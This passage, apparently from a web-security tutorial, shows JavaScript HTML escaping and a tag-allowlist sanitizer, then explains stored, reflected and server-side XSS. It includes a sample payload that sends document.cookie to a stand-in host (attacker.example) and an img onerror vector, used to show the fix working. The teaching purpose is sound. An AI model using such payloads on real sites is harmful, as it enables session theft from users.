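//    so onerror=, onclick= and javascript: URLs can never survive.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br']);
function sanitizeComment(html) {
  return escapeHtml(html).replace(/&lt;(\/?)([a-zA-Z]+)&gt;/g, (match, slash, name) =>
    ALLOWED_TAGS.has(name.toLowerCase()) ? `<${slash}${name.toLowerCase()}>` : match);
}

// Constructed payloads
const REFLECTED_PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
const STORED_PAYLOAD = '<b>nice post</b><img src=x onerror=alert(1)>';

console.log(searchPageVulnerable(REFLECTED_PAYLOAD).includes('<script>')); // true: script would run
console.log(searchPage(REFLECTED_PAYLOAD).includes('<script>'));           // false: shown as text
console.log(sanitizeComment(STORED_PAYLOAD));
// <b>nice post</b>&lt;img src=x onerror=alert(1)&gt;
```

`escapeHtml` is correct only for text placed in the HTML body; a value written into an attribute, a `<script>` block or a URL needs the encoder for that context, which is the caveat behind point 1d. The sanitizer's escape-first order matters: because every `<` is neutralized before any tag is re-enabled, a payload like `<img ... onerror=...>` can only ever come out as harmless text.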

XSS vulnerabilities

Following are the kinds of XSS vulnerability:

1. Stored XSS vulnerabilities:

a. Stored attacks are those where the injected script is permanently stored on the target server, such as in a database, a message forum, a visitor log or a comment field.

b. The victim then retrieves the malicious script from the server when requesting the stored information. Stored XSS is also referred to as persistent or Type-I XSS.

2. Reflected XSS vulnerabilities:

a. Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, a search result, or any other response that includes some or all of the input sent to the server as part of the request.

b. Reflected attacks are delivered to victims via another route, such as an e-mail message or another website.

c. When a user is tricked into clicking a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable website, which reflects the attack back to the user's browser.

d. The browser then executes the code because it came from a trusted server.

e. Reflected XSS is also referred to as non-persistent or Type-II XSS.

3. Server-side versus DOM-based vulnerabilities:

a. XSS vulnerabilities were first found in applications that performed all data processing on the server side.

b. User input (including an XSS vector) would be sent to the server and then sent back to the user as part of a web page.
